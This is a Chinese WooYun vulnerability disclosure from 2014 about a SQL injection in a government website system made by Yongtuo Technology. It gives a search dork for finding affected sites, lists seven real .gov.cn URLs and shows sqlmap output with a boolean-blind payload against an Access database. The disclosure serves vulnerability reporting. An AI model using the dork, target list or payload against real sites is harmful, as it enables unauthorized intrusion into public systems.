当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080383

漏洞标题:永拓科技某个政府建站系统sql注入漏洞

相关厂商:永拓科技

漏洞作者: 海绵宝宝

提交时间:2014-10-23 16:37

修复时间:2015-01-21 16:38

公开时间:2015-01-21 16:38

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

审核的大大,我又来来,这回有所属厂商了,url格式也一样了。
广州用拓科技所用政府建站系统sql注入漏洞.

详细说明:

百度关键词

技术支持:永拓科技  inurl:gov.cn/ShowNews.asp


url格式为 http://xxx.gov.cn/shownews.asp?id=xx&Bid=xx&Sid=xx
的存在sql注入漏洞.
测试地址

http://www.chstats.gov.cn/shownews.asp?id=304&Bid=7&Sid=
http://chssgw.gov.cn/shownews.asp?id=2545&Bid=4&Sid=25
http://www.chcj.gov.cn/shownews.asp?id=359&Bid=77&Sid=49
http://www.conghuajt.gov.cn/shownews.asp?id=381&Bid=76&Sid=
http://www.chaudit.gov.cn/shownews.asp?id=230&Bid=77&Sid=46
http://www.chlt.gov.cn/shownews.asp?id=474&Bid=76&Sid=
http://www.chny.gov.cn/shownews.asp?id=350&Bid=89&Sid=61

漏洞证明:

数据库类型均为ACCESS
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=528 AND 8012=8012
---
[16:52:07] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft Access

修复方案:

建议该市政府换个靠谱点建站厂商

版权声明:转载请注明来源 海绵宝宝@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝